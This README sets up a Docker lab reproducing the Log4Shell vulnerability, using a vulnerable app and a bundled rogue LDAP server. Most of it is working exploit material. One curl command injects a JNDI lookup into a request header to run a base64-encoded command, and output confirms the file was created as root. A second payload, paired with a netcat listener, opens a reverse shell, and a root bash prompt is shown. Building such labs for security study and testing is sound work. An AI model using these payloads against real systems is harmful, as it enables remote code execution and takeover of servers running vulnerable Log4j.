full playground setup for log4shell using this great app and documentation (their blog post)and this rogue LDAP server (codechina mirror as it was removed from github)

Both projects copied into this repo and original README/LICENSEs kept under each.

Quickstart

• Launch the lab

docker compose up

• Send payload to *vulnapp`

curl 127.0.0.1:40000 -H 'X-Api-Version: ${jndi:ldap://ldap:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

• Verify payload executed

docker compose exec vulnapp ls -l /tmp/pwned
-rw-r--r--    1 root     root             0 Dec 14 01:43 /tmp/pwned

Check JNDIExploit README for more options (paths), such as reverse shell:

1. Install bash in vulnapp (does not work with alpine sh): docker compose exec apk add bash
2. Start netcat on ldap container (but can be anywhere) docker compose exec ldap nc -nvlp 7677
3. Use /Reverseshell path: curl 127.0.0.1:40000 -H 'X-Api-Version: ${jndi:ldap://ldap:1389/Basic/ReverseShell/ldap/7677}'
4. Enjoy the shell

listening on [::]:7677 ...
connect to [::ffff:172.19.0.2]:7677 from [::ffff:172.19.0.3]:38094 ([::ffff:172.19.0.3]:38094)
bash-4.4#